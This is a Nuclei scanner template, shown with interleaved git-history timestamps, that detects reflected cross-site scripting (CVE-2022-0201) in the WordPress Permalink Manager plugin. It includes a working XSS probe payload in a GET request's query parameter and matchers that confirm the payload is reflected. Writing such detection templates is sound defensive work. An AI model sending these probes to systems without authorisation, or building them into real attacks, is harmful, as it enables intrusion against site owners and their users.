nuclei-templates/http/cves/2022/CVE-2022-0201.yaml

51 lines
2.0 KiB
YAML
Raw Normal View History

2022-05-05 17:02:43 +00:00
id: CVE-2022-0201
info:
name: WordPress Permalink Manager <2.2.15 - Cross-Site Scripting
2022-05-05 17:02:43 +00:00
author: Akincibor
severity: medium
description: |
WordPress Permalink Manager Lite and Pro plugins before 2.2.15 contain a reflected cross-site scripting vulnerability. They do not sanitize and escape query parameters before outputting them back in the debug page.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft, session hijacking, or defacement of the affected website.
2023-09-06 11:59:08 +00:00
remediation: |
Update to WordPress Permalink Manager version 2.2.15 or later to mitigate the vulnerability.
2022-05-05 17:02:43 +00:00
reference:
- https://wpscan.com/vulnerability/f274b0d8-74bf-43de-9051-29ce36d78ad4
- https://plugins.trac.wordpress.org/changeset/2656512
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0201
cwe-id: CWE-79
2023-10-14 11:27:55 +00:00
epss-score: 0.001
epss-percentile: 0.41295
2023-09-06 11:59:08 +00:00
cpe: cpe:2.3:a:permalink_manager_lite_project:permalink_manager_lite:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: permalink_manager_lite_project
product: permalink_manager_lite
2023-09-06 11:59:08 +00:00
framework: wordpress
2024-01-14 09:21:50 +00:00
tags: cve,cve2022,wp-plugin,wpscan,xss,wordpress,permalink_manager_lite_project
2022-05-05 17:02:43 +00:00
http:
2022-05-05 17:02:43 +00:00
- method: GET
path:
- '{{BaseURL}}/index.php?p=%3Cimg%20src%20onerror=alert(/XSS/)%3E&debug_url=1'
matchers-condition: and
matchers:
- type: word
part: body
words:
- '<img src onerror=alert(/XSS/)>'
- 'pm_query'
condition: and
- type: word
part: header
words:
- text/html
# digest: 4a0a004730450221008c06d6874a2519e8423b2769a4ad1c1fb83e01ecb95480d09bb27c76abde9129022018f709b1ad9c66d79205c5b66ce9aca52fe52b2fa20402b980b430ddc5e18838:922c64590222798bb761d5b6d8e72950